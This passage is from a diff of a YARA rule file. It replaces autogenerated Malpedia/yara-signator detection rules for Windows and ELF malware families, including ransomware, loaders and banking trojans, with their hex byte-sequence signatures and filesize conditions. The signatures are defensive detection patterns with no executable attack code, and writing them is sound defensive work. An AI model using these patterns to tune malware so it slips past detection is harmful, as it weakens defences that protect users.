+		$sequence_41 = { 0f8280000000 813950450000 7578 f6411602 7472 }
+		$sequence_42 = { f7e2 8d9500040000 03d0 895510 }
+		$sequence_43 = { c744242000300000 ff15???????? 85c0 7911 }
+		$sequence_44 = { 790f 8bc8 e8???????? 8d5e10 }
+		$sequence_45 = { 8bcf e8???????? 8bf0 85ed }
+		$sequence_46 = { 7911 8bc8 e8???????? bb10000000 }
+		$sequence_47 = { 33c9 33d2 ff15???????? 85c0 }
+		$sequence_48 = { 7c22 3c39 7f1e 0fbec0 }
+		$sequence_49 = { 7536 b906000000 8bc1 c3 }
+		$sequence_50 = { 58 41 41 41 41 }
+		$sequence_51 = { 8bcd 84c0 742e 660f1f440000 3c30 7c22 }
+		$sequence_52 = { ff15???????? 8bf0 c1ee1f 83f601 }
+		$sequence_53 = { ff15???????? 85c0 0f89d2000000 8bc8 e8???????? }
+		$sequence_54 = { eb0a 83f802 742b 83f803 745b }
+		$sequence_55 = { 8bc8 33c0 85c9 0f95c0 eb02 }
+		$sequence_56 = { 41 41 50 2bc1 8b00 }
+		$sequence_57 = { 2bc1 c1e002 51 8bcf }
+		$sequence_58 = { 6a00 6a00 ff15???????? 6a00 6a00 6a00 8d45dc }
+		$sequence_59 = { 8b7d10 2bf9 53 50 }
+		$sequence_60 = { 8dbf00500310 8bd6 897d08 3bc8 }
+		$sequence_61 = { 8b4d08 dd01 8b7510 dd1e e9???????? c745dce8c20001 }
+		$sequence_62 = { 3302 52 8bd0 51 03cf 51 58 }
+		$sequence_63 = { 58 8910 59 5a }
+		$sequence_64 = { 760b 8b45d0 83e801 8945d0 }
+		$sequence_65 = { 8945d4 8b4dfc 51 8b55d4 52 e8???????? 8b45fc }
+		$sequence_66 = { 85c0 7417 817de013010000 7502 eb0c 8d45dc 50 }
+		$sequence_67 = { bad64abad6 4a ba5d12f75d 12f7 5d 12f7 5d }
+		$sequence_68 = { c705????????ad380001 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
+		$sequence_69 = { 51 6800300400 8b55f8 52 ff15???????? 8945fc 837dfc00 }
+		$sequence_70 = { 40 8945d0 ff75fc ff75d0 }
+		$sequence_71 = { 84c0 741d 56 68???????? 8bc7 e8???????? }
+		$sequence_72 = { 8b4508 56 8d34c590f30001 833e00 7513 }
+		$sequence_73 = { f361 34aa 61 34aa }
+		$sequence_74 = { c1e803 85c0 7414 56 57 }
+		$sequence_75 = { 56 ff750c 6818280300 5e 56 }
+		$sequence_76 = { 83c408 eb18 81ff01030000 7d10 53 53 }
+		$sequence_77 = { 7420 8b4de0 83c101 894de0 817de014010000 }
 
 	condition:
-		7 of them and filesize < 347328
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Sappycache_Auto : FILE
+rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7cc3c8f2-16b3-5753-b1dc-441bde2f37db"
+		id = "b5a0679d-3efc-5c9d-b682-041d8a2aacea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sappycache_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apocalypse_ransom_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "69868e0b80392ecc35dcd562f65c813ca6117f731788d5ab611817e1e3bff002"
+		logic_hash = "8cee33b1e4eac4c1405375639b552a991305017c9df19464c32f3823d3e5b8e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103036,19 +103347,19 @@ rule MALPEDIA_Win_Sappycache_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 4c8bc3 33d2 488bc8 488907 488be8 e8???????? }
-		$sequence_1 = { 0f84a0000000 817c242000140000 0f8592000000 488d05b8600100 b928000000 }
-		$sequence_2 = { 4863c9 488d1556fa0000 488bc1 83e13f 48c1f806 }
-		$sequence_3 = { 4c8d442440 8bca 488d542448 48c1e109 4903cc e8???????? 488b5c2448 }
-		$sequence_4 = { 488bfb 48895c2420 8b05???????? 3bf0 7c3b 4c8d3db7fa0000 }
-		$sequence_5 = { 4889442478 488bd8 4885c0 0f840d060000 4889bc2488630000 }
-		$sequence_6 = { 488bcf ff15???????? b801000000 488b6c2440 488b742448 488b7c2450 488b4c2428 }
-		$sequence_7 = { ff15???????? 488d4540 498bd7 48ffc2 44382c10 }
-		$sequence_8 = { 488d15bdcbffff 488d0c10 813950450000 755f b80b020000 66394118 7554 }
-		$sequence_9 = { 4883ec68 488b05???????? 4833c4 4889442450 33ff 33db }
+		$sequence_0 = { 6800010000 6a00 6a00 6a00 8d4c2424 51 6880000000 }
+		$sequence_1 = { 8d4c2414 51 ffd7 03c0 50 8b442414 }
+		$sequence_2 = { 8bc3 e8???????? 6a04 6800100000 68ff7f0000 6a00 }
+		$sequence_3 = { 8b2d???????? 52 ffd5 8d442410 }
+		$sequence_4 = { ff15???????? 6a03 56 ff15???????? 56 ff15???????? 5f }
+		$sequence_5 = { 51 68???????? 6801000080 ffd6 8b3d???????? 8d542414 52 }
+		$sequence_6 = { 8d542444 52 56 68???????? 8d842474020000 50 eb13 }
+		$sequence_7 = { 6a00 6880000000 6a03 6a00 6a01 6800000080 8d4c2440 }
+		$sequence_8 = { 6801000080 ffd6 8b3d???????? 8d542414 52 ffd7 8b4c2410 }
+		$sequence_9 = { 743b 56 68???????? ffd5 83c408 6a00 6a00 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 40960
 }
 rule MALPEDIA_Win_Yahoyah_Auto : FILE
 {
@@ -103093,18 +103404,18 @@ rule MALPEDIA_Win_Yahoyah_Auto : FILE
 	condition:
 		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Quantloader_Auto : FILE
+rule MALPEDIA_Win_Spaceship_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6fbe65e-ef8a-5bc4-b8a9-95dfb59d427c"
+		id = "e9646ae9-48ad-52ca-8e30-ca37f230b031"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quantloader_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spaceship_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "bf8a50a2e031ac2dab43be4a697ae58f19b78ab51aef8ac12657d4c13c8a8701"
+		logic_hash = "918a94f75a146e2a40061812363f222c7587d1698068cc2f3629d9e72d72f097"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103118,38 +103429,32 @@ rule MALPEDIA_Win_Quantloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f8 837df800 7405 8b45f8 ffd0 c9 c3 }
-		$sequence_1 = { e8???????? c744240800000000 c7442404???????? 8b4508 890424 e8???????? 85c0 }
-		$sequence_2 = { 8b45f8 40 8945f0 eb13 }
-		$sequence_3 = { c785d4f7ffff00000000 e9???????? c744241400000000 c744241000000084 c744240c00000000 c744240800000000 8b4508 }
-		$sequence_4 = { c70424???????? e8???????? 83ec08 8b450c }
-		$sequence_5 = { 837df400 750f c785d4f7ffff00000000 e9???????? }
-		$sequence_6 = { c70424???????? e8???????? 85c0 0f8eaa000000 }
-		$sequence_7 = { e8???????? 89442404 c70424???????? e8???????? c7442408???????? c7442404???????? c7042402000080 }
-		$sequence_8 = { 33c0 66ad 66a90030 7408 }
-		$sequence_9 = { c3 8b7d74 6a04 6800100000 57 6a00 ff5510 }
-		$sequence_10 = { 60 8bf3 03763c 8bb680000000 85f6 }
-		$sequence_11 = { c7457c00000000 81c243e15762 8b4d74 8bfe 837d6400 7403 017564 }
-		$sequence_12 = { 7410 b904000000 48 7408 b940000000 48 7400 }
-		$sequence_13 = { 8bf8 f3a4 e8???????? 48 }
-		$sequence_14 = { 51 50 54 6a04 51 57 ff550c }
-		$sequence_15 = { 33c0 39411c 74f7 ff711c 8f4550 e8???????? 8f411c }
+		$sequence_0 = { 68???????? f2ae 8bcb 4f c1e902 f3a5 8bcb }
+		$sequence_1 = { 66395cc416 f3a4 74c1 81e2ffff0000 83c9ff 03d0 33c0 }
+		$sequence_2 = { 66c78424bc0100000d00 66898424be010000 c78424c00100001c6b4100 66c78424c40100002500 }
+		$sequence_3 = { 8bcb 83e103 f3a4 83c9ff bf???????? f2ae f7d1 }
+		$sequence_4 = { f2ae 8bcb 4f c1e902 f3a5 8b45f0 }
+		$sequence_5 = { 80a0c0d9410000 40 3bc6 72be 5e c9 c3 }
+		$sequence_6 = { 6a00 6810040000 ff15???????? 8bf0 56 ffd5 }
+		$sequence_7 = { 66899c24e6040000 c78424e80400001c674100 66c78424ec0400004a00 66899c24ee040000 c78424f004000014674100 66c78424f40400001e00 66899c24f6040000 }
+		$sequence_8 = { 8a441c0c 8d741c0c 84c0 75bc 5f 5e }
+		$sequence_9 = { c7842408050000f8664100 66c784240c0500002000 6689ac240e050000 c7842410050000f0664100 66899c2414050000 6689842416050000 c7842418050000e4664100 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Bernhardpos_Auto : FILE
+rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "252fe43d-34d2-5ba3-916c-e631fcda4c17"
+		id = "36a9a672-4992-57ea-891c-f29c4225a913"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bernhardpos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypt0l0cker_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a85fc3a62e77b7c1681166d26b96a4f5d23c2afe6eddbdde5dc49efbc64461ae"
+		logic_hash = "b3cddc973c5366c89b799135e4693f1cb6d7cd129335c29ced490dcf89284e44"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103163,73 +103468,73 @@ rule MALPEDIA_Win_Bernhardpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4508 50 ff15???????? 8945fc c745f800000000 c745f400000000 }
-		$sequence_1 = { 884a02 6a01 ff15???????? 8b8d58feffff }
-		$sequence_2 = { 50 8d8dc8fbffff 51 ff15???????? 6a00 }
-		$sequence_3 = { 8bec 81ec84040000 53 56 57 6a04 }
-		$sequence_4 = { 85c0 0f8488010000 8b45fc 8b4844 51 }
-		$sequence_5 = { 8d8550feffff 50 8d8d5cfeffff 51 6a00 }
-		$sequence_6 = { 8b4dec c1e108 0345e8 03c8 }
-		$sequence_7 = { 8b45e4 c1e806 83e03f 8b4d0c 034df4 }
-		$sequence_8 = { e8???????? a3???????? 68a86b4aa0 a1???????? 50 e8???????? }
-		$sequence_9 = { e8???????? a3???????? 684f5b51f2 a1???????? 50 e8???????? a3???????? }
+		$sequence_0 = { 8bcb e8???????? eb05 bf03000000 56 6a01 682f5b5412 }
+		$sequence_1 = { 53 e8???????? 59 59 85c0 0f84bbfeffff 8b45f8 }
+		$sequence_2 = { 8bcf e8???????? 8b4c2418 e8???????? 85f6 740f 56 }
+		$sequence_3 = { 0f8e85000000 53 ff75fc 8d45a8 50 8bd0 8d4dbc }
+		$sequence_4 = { 33c1 894ee8 8946ec 8d042e c1f802 8b4c8314 8bc1 }
+		$sequence_5 = { 68???????? bac8cfa6d0 8bce e8???????? 83c404 85c0 0f85b2000000 }
+		$sequence_6 = { e8???????? 83c40c 68fd010000 53 85f6 7506 }
+		$sequence_7 = { 3bf2 7301 47 03d8 895de8 3bd8 }
+		$sequence_8 = { 8be5 5d c3 55 8bec 83ec18 8bc2 }
+		$sequence_9 = { 0f8520080000 c74424143c000000 55 8d4900 837e3400 0f8505080000 833e01 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 917504
 }
-rule MALPEDIA_Elf_Gobrat_Auto : FILE
+rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9cb05d8e-88df-5069-9152-096fc77aac24"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.gobrat_auto.yar#L1-L134"
+		id = "c161add4-90a4-5a07-9de8-bcd8a57e3d69"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newcore_rat_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "29d6047280b8adce38a5f6a7e3d8112ab4747228198bdfc531ab746feecbff32"
-		score = 60
-		quality = 35
+		logic_hash = "85672d8cf8a6bd59109d6c5a704fff80f074ddc2465adb99808889ae02b39e81"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4889fa e9???????? 488d842400010000 488d1d22cf1700 b90b000000 488bbc2420020000 }
-		$sequence_1 = { e8???????? 488b842408010000 488b9c2400010000 488b4c2468 e8???????? e9???????? 4883f917 }
-		$sequence_2 = { 8d3431 8d76c6 0f1f440000 4883fa06 0f83bf000000 440fb644145c 4131f0 }
-		$sequence_3 = { e8???????? 488b5c2460 e8???????? 488b6c2448 4883c450 c3 4889442408 }
-		$sequence_4 = { e8???????? 488d3d2cd23b00 e8???????? 488b6c2478 4883ec80 c3 4889ca }
-		$sequence_5 = { ebd5 31f6 90 e8???????? ebcb 498b5010 4839d1 }
-		$sequence_6 = { e8???????? 488b442430 48ffc0 488b5c2420 4883c3fe 488b9424a8010000 488bb42458010000 }
-		$sequence_7 = { f20f10442428 f20f5e05???????? f20f114040 488b542450 6690 4883fa08 7e3f }
-		$sequence_8 = { e8???????? 6690 4885c9 0f8578010000 488d0d90371500 4839c8 7505 }
-		$sequence_9 = { e8???????? 488b6d00 488d05225c0500 488d4c2470 e8???????? 31c0 eb28 }
+		$sequence_0 = { 8b883c200000 52 51 c744241000000000 ff15???????? f7d8 1bc0 }
+		$sequence_1 = { 51 57 6a01 53 52 55 ff15???????? }
+		$sequence_2 = { c686c800000043 c6864b01000043 c7466878920310 6a0d e8???????? 59 8365fc00 }
+		$sequence_3 = { 0f8788000000 0fb69028720010 ff249508720010 33c0 83c40c c3 8b4644 }
+		$sequence_4 = { 57 8b78f4 894dfc 85db }
+		$sequence_5 = { 0430 0fb64c2426 8844242f 8bc1 c1e804 83f809 }
+		$sequence_6 = { 8984242c040000 8b842434040000 53 55 56 57 8bf1 }
+		$sequence_7 = { 81ec54020000 a1???????? 33c4 8984244c020000 8b842458020000 55 }
+		$sequence_8 = { b903000000 668994249c000000 668984249e000000 66898c24a0000000 ba01000000 66899424a2000000 b809000000 }
+		$sequence_9 = { e9???????? 8b442410 6a04 56 50 8bde c744242400000000 }
 
 	condition:
-		7 of them and filesize < 12853248
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Bluelight_Auto : FILE
+rule MALPEDIA_Win_Isfb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e926d75-3ab2-5756-a7ce-3e5a6c0d0aa0"
+		id = "b7221ee8-15b6-53d3-9858-cbee4891c3dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluelight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isfb_auto.yar#L1-L1225"
 		license_url = "N/A"
-		logic_hash = "41a5ac3b75dc9289131b8472b69bdf4cdf3bf64ebeaeb2e76e9bbd4dca7df902"
+		logic_hash = "8c0f88cb914238661f125a7c021aa83545337967694ef579c4ecd4c1e0598934"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -103241,32 +103546,163 @@ rule MALPEDIA_Win_Bluelight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff771c ff15???????? ff771c 8b7714 ff15???????? 5f 8bc6 }
-		$sequence_1 = { 884dc7 8955d0 81faa7000000 0f87a8410000 ff249526044300 6b4b0428 6a04 }
-		$sequence_2 = { 85db 740f ff7760 53 ff7764 e8???????? 83c40c }
-		$sequence_3 = { eb0c 8b4508 8907 c7450800000000 8b4518 894710 8b4520 }
-		$sequence_4 = { f64605c0 7415 8d442420 68???????? 50 e8???????? ff44241c }
-		$sequence_5 = { e8???????? 8d4d8c 894314 e8???????? 8d4d9c e8???????? 8d4d94 }
-		$sequence_6 = { e8???????? b8???????? e9???????? 8d8d60feffff e9???????? 8d4da8 e9???????? }
-		$sequence_7 = { ff761c 50 e8???????? 83c410 8d4510 50 ff750c }
-		$sequence_8 = { 8b45d4 3bde 7507 8bc8 e8???????? 8a4d9f 33db }
-		$sequence_9 = { ff7304 8b4d0c ff73ec 6a2d 5a e8???????? 8943ec }
+		$sequence_0 = { eb02 33c0 3bc7 741b 50 33c0 }
+		$sequence_1 = { 50 33c0 e8???????? 3bc7 740f }
+		$sequence_2 = { e8???????? eb02 33c0 3bc7 7413 50 }
+		$sequence_3 = { 3bc7 7413 50 6a10 58 e8???????? }
+		$sequence_4 = { 6a10 58 e8???????? 3bc7 7406 50 e8???????? }
+		$sequence_5 = { ff75f0 ff75f4 6822010000 e9???????? ff7508 }
+		$sequence_6 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 }
+		$sequence_7 = { ff35???????? e8???????? 8bf0 3bf3 7443 }
+		$sequence_8 = { 5e 8bc5 5d 5b 59 c20400 8325????????00 }
+		$sequence_9 = { 59 c20400 8325????????00 6a00 68???????? 6a01 ff742410 }
+		$sequence_10 = { ff15???????? 85c0 a3???????? 7402 ffe0 c20400 }
+		$sequence_11 = { 50 e8???????? 3bdf 7414 }
+		$sequence_12 = { c20400 55 8bec 83ec0c a1???????? 8365f800 57 }
+		$sequence_13 = { ff15???????? 3c05 7506 84e4 7704 }
+		$sequence_14 = { 8b4e10 83e103 740d 51 50 ff7510 e8???????? }
+		$sequence_15 = { 7417 8b10 2b55fc 8b7d10 0155fc }
+		$sequence_16 = { ff7510 e8???????? 83c40c c745fc01000000 8b4610 }
+		$sequence_17 = { 8bd8 85db 895df4 0f84c7000000 56 53 }
+		$sequence_18 = { b8???????? 53 bb60ea0000 53 ff750c }
+		$sequence_19 = { 8b7d10 0155fc 83451004 83c004 49 8917 75e9 }
+		$sequence_20 = { ff37 ff15???????? 2b442414 50 8b07 }
+		$sequence_21 = { 6a0d 58 e8???????? 85c0 740d 8906 83c604 }
+		$sequence_22 = { 83c40c 8974240c c6401a00 8b44240c 85c0 }
+		$sequence_23 = { 8b07 03442418 50 56 ff5310 }
+		$sequence_24 = { 5b c20800 55 8bec 83e4f8 83ec14 8364240400 }
+		$sequence_25 = { 8906 83c604 47 83ff03 }
+		$sequence_26 = { ff35???????? ff15???????? 8b442414 8b4c240c 8907 8b442418 894110 }
+		$sequence_27 = { 8b4b24 2b4b28 894c2410 8b4b34 f6c140 }
+		$sequence_28 = { 8b5d0c 837b240c 56 57 8b3b 897c241c 760a }
+		$sequence_29 = { 8b3b 897c241c 760a 8b4b20 e8???????? eb02 }
+		$sequence_30 = { 74a3 33ff eb0b 33ff eb03 }
+		$sequence_31 = { 8b4a0c 3bc8 7415 8b5210 }
+		$sequence_32 = { 752f 8b450c 8930 eb33 6a00 }
+		$sequence_33 = { 8b4a3c 03ca 0fb75114 56 }
+		$sequence_34 = { 50 8d4508 50 53 8bc6 e8???????? }
+		$sequence_35 = { 750e 837d0800 7408 ff7508 e8???????? }
+		$sequence_36 = { 83ec48 53 8b5d08 56 57 33ff }
+		$sequence_37 = { 8b5210 3bd0 740e 8b742408 }
+		$sequence_38 = { 837d1800 b8???????? 7505 b8???????? 53 }
+		$sequence_39 = { 8a4604 2404 f6d8 1bc0 83e006 }
+		$sequence_40 = { 742d ff75fc 6a0d 58 }
+		$sequence_41 = { c21000 55 8bec 83ec14 a1???????? 53 }
+		$sequence_42 = { 50 57 6a01 ff75e0 68???????? e8???????? }
+		$sequence_43 = { 53 b800080000 50 56 ff35???????? }
+		$sequence_44 = { 8b35???????? 50 83c604 e8???????? 3bfb }
+		$sequence_45 = { 50 8bd7 e8???????? eb02 33c0 3bc3 741b }
+		$sequence_46 = { 50 e8???????? 3bfb 7414 }
+		$sequence_47 = { e8???????? 85db 7423 8b0d???????? 0fb701 }
+		$sequence_48 = { ff75fc 56 ff35???????? ff15???????? 53 56 }
+		$sequence_49 = { 0f854affffff 894330 e9???????? 55 }
+		$sequence_50 = { 752e 53 e8???????? 6a01 6a01 ff7514 }
+		$sequence_51 = { 8bf8 85ff 0f845d010000 8b4730 a808 }
+		$sequence_52 = { 0f84e2000000 8b7334 8d442418 50 8d442410 50 e8???????? }
+		$sequence_53 = { 8bf8 ff7510 57 ff750c 53 e8???????? 3bfe }
+		$sequence_54 = { ff15???????? 53 56 ff35???????? ff15???????? 5b }
+		$sequence_55 = { 0f8544010000 8b472c a801 742d }
+		$sequence_56 = { 50 56 ff5214 8bf7 8bfe e8???????? 5f }
+		$sequence_57 = { 56 ff35???????? 8945f8 ff15???????? 8bd8 }
+		$sequence_58 = { 8b4330 a804 0f8451ffffff 8b470c }
+		$sequence_59 = { 33f6 3975fc 7410 ff75fc 56 ff35???????? }
+		$sequence_60 = { a840 7509 83632800 e9???????? 8b4330 a840 0f84e2000000 }
+		$sequence_61 = { 53 e8???????? 3bfe 740e 57 56 }
+		$sequence_62 = { 7708 0fb7c0 83e820 eb03 0fb7c0 668901 5f }
+		$sequence_63 = { c9 c20400 51 56 ff74240c }
+		$sequence_64 = { e8???????? 85c0 7507 33db 895d08 eb03 }
+		$sequence_65 = { 50 57 e8???????? e9???????? 68???????? }
+		$sequence_66 = { ff35???????? ff15???????? 33db 6a01 e8???????? }
+		$sequence_67 = { 8b45fc 5f 5b c9 c21400 55 }
+		$sequence_68 = { 8b3d???????? 56 ffd7 53 56 ffd7 }
+		$sequence_69 = { 8ac3 5b c9 c20400 53 56 8bf0 }
+		$sequence_70 = { 8bf0 8932 83c204 ff4c240c 75e6 5e 5b }
+		$sequence_71 = { 8bf1 05fefeffff 33db 33c9 }
+		$sequence_72 = { 750d eb09 ff7618 ff15???????? }
+		$sequence_73 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 }
+		$sequence_74 = { 5b c3 a1???????? 83c040 }
+		$sequence_75 = { 3bfb 753e ff7618 8b3d???????? ffd7 ff761c }
+		$sequence_76 = { 47 83c304 3b3e 72dc 8b45fc }
+		$sequence_77 = { 53 ff7614 ff15???????? 85c0 7512 ff15???????? }
+		$sequence_78 = { 8d442430 50 8d442428 50 8d442428 50 }
+		$sequence_79 = { 488bd8 0f8405010000 488bc8 ff15???????? }
+		$sequence_80 = { 7416 a1???????? 83c004 50 be???????? }
+		$sequence_81 = { e8???????? e9???????? b909010000 e9???????? }
+		$sequence_82 = { ff15???????? 488bcf 48870d???????? 483bcf 7405 }
+		$sequence_83 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 }
+		$sequence_84 = { b90e010000 41b800000100 4889442420 e8???????? e9???????? }
+		$sequence_85 = { 741d 3dd2100000 7416 a1???????? }
+		$sequence_86 = { ff35???????? ffd3 8bd8 85db 7476 }
+		$sequence_87 = { 898c24f0000000 4533c9 4533c0 498bcb ff5028 }
+		$sequence_88 = { 0f8386000000 488b18 8364245800 33c0 21442450 21442454 }
+		$sequence_89 = { 6a03 8935???????? 8935???????? 8935???????? }
+		$sequence_90 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 e8???????? 85c0 8bd8 }
+		$sequence_91 = { 53 56 8bf1 05fefeffff }
+		$sequence_92 = { a1???????? 25efff0000 0bc2 e9???????? }
+		$sequence_93 = { 898424f4000000 498b03 898c24f0000000 4533c9 }
+		$sequence_94 = { 33db 66ba2000 498bcc ff15???????? 4885c0 488bf8 7417 }
+		$sequence_95 = { 8b8c2490000000 83bc248800000000 4c8b442440 488b542448 }
+		$sequence_96 = { e9???????? 4885f6 7417 4863461c 2b6e1c 4c03e8 488b4610 }
+		$sequence_97 = { 4883ec20 488bf1 488b0d???????? 4c8be2 }
+		$sequence_98 = { 4154 4155 4883ec30 33db 33ed 418bf9 48215810 }
+		$sequence_99 = { 488b0d???????? 448bc3 33d2 41c1e003 ff15???????? 4885c0 488be8 }
+		$sequence_100 = { 0f84eb000000 83780408 0f84d9000000 488bcb e8???????? }
+		$sequence_101 = { 488b0d???????? 33d2 ff15???????? bb01000000 498bcc eb07 83c301 }
+		$sequence_102 = { 895df4 895df0 c745f857000000 bf19010000 }
+		$sequence_103 = { eb08 488bce e8???????? 488b5c2440 488b742448 488bc7 }
+		$sequence_104 = { 488b5610 4d8bc6 488bc8 e8???????? 4863561c 8bc5 2b461c }
+		$sequence_105 = { 488bcf ff15???????? 4c8964dd00 83c301 }
+		$sequence_106 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 53 }
+		$sequence_107 = { 8bc7 e8???????? 8d4618 8b08 50 51 ff7614 }
+		$sequence_108 = { 8bc6 e8???????? 8b06 8b08 57 }
+		$sequence_109 = { 6a20 40 50 ffd6 }
+		$sequence_110 = { 5e 33c0 c9 c20400 55 8bec 51 }
+		$sequence_111 = { 4c8bcf 4889442428 8364242000 33d2 33c9 ff15???????? }
+		$sequence_112 = { 7557 813d????????04df2209 743c 8d4604 50 }
+		$sequence_113 = { 488b0d???????? 4c63c0 33d2 4983c00c ff15???????? }
+		$sequence_114 = { ff15???????? 83cfff 3bc7 8bd8 }
+		$sequence_115 = { 480f45ca 488bc1 4883c438 c3 48895c2408 48896c2410 4889742418 }
+		$sequence_116 = { 448bc0 8bd8 33d2 4983c001 }
+		$sequence_117 = { e9???????? 488bcb ff15???????? a810 }
+		$sequence_118 = { ff15???????? 8945f8 85c0 7418 3bd8 7514 57 }
+		$sequence_119 = { 803f2a 750b 4883c701 83c3ff }
+		$sequence_120 = { 85ff 756f 8b0d???????? 8b05???????? }
+		$sequence_121 = { 4d03c0 33d2 ff15???????? 488be8 }
+		$sequence_122 = { 75ee 488bd5 33c9 ff15???????? 488bf8 }
+		$sequence_123 = { 488bf8 4885c0 7420 488bd3 488bc8 ff15???????? 488b0d???????? }
+		$sequence_124 = { 741d 397b04 7618 488d7308 488b0e ff15???????? ffc7 }
+		$sequence_125 = { c744242880000000 89742420 ff15???????? 488bf0 4883f8ff 742b }
+		$sequence_126 = { 7510 488b0b e8???????? 85c0 0f859b000000 }
+		$sequence_127 = { 85c0 0f8561010000 8b4348 a801 742c 488b0b e8???????? }
+		$sequence_128 = { 85c0 0f859b000000 4863533c 488b4608 }
+		$sequence_129 = { 8b434c 84c0 0f89a3000000 8b434c a804 7415 }
+		$sequence_130 = { 85c0 0f85e8000000 488b4608 488b0e 4533c9 }
+		$sequence_131 = { e8???????? 85c0 0f8561010000 8b4348 }
+		$sequence_132 = { 7505 217b3c eb0b 8b434c 84c0 0f89a3000000 }
+		$sequence_133 = { 7508 8b5304 83c304 01f2 8b4c241c 01d1 }
+		$sequence_134 = { 8b4c2424 01c1 83c304 894c2410 56 90 }
+		$sequence_135 = { 40 c1ca08 e2e4 c9 }
+		$sequence_136 = { 56 57 51 64ff3530000000 58 8b400c }
+		$sequence_137 = { 30c9 eb67 8044241301 0fb6ca 01cb }
+		$sequence_138 = { 89ec 5d c20c00 60 }
